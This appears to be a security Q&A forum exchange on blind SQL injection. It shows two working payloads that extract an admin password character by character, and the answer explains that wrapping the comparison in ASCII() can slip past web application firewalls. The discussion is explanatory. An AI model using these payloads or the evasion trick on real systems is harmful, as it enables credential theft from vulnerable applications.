I mean, I can exploit the vulnerability using a substring function and without using an ASCII function like:
SELECT username FROM users WHERE id = 1 AND (SELECT substring(password,1,1) FROM users WHERE username = 'admin' ) = 'a';
And I can exploit the vulnerability like this:
SELECT username FROM users WHERE id = 1 AND (SELECT ASCII(substring(password,1,1)) FROM users WHERE username = 'admin' ) = '97';
What is the wisdom of using the ascii function?
One possible answer: it might fool a Web Application Firewall. WAFs are fragile, stupid things, and usually are looking for regular expressions or even hardcoded strings to block. It's quite common to bypass them by adding extra, pointless content to a payload.
What's more, WAF vendors tend to be slow to fix such holes, so a given WAF bypass might exist for months or years, and become well-known in the security community. At such point, it is likely being used by people who don't know why it's there, and on systems that don't require it - that's just "the example they saw of SQLi" or whatever - and thus gets passed on into even more examples, used in exploit kits, and so on. In other words, it sort of metastasizes and may live on for years or decades, even if the original vulnerability is long gone.
... and then, because it becomes so well known as something that is used when attempting a malicious attack, WAF (and similar product) vendors might start looking for that exact string, and we come full circle.
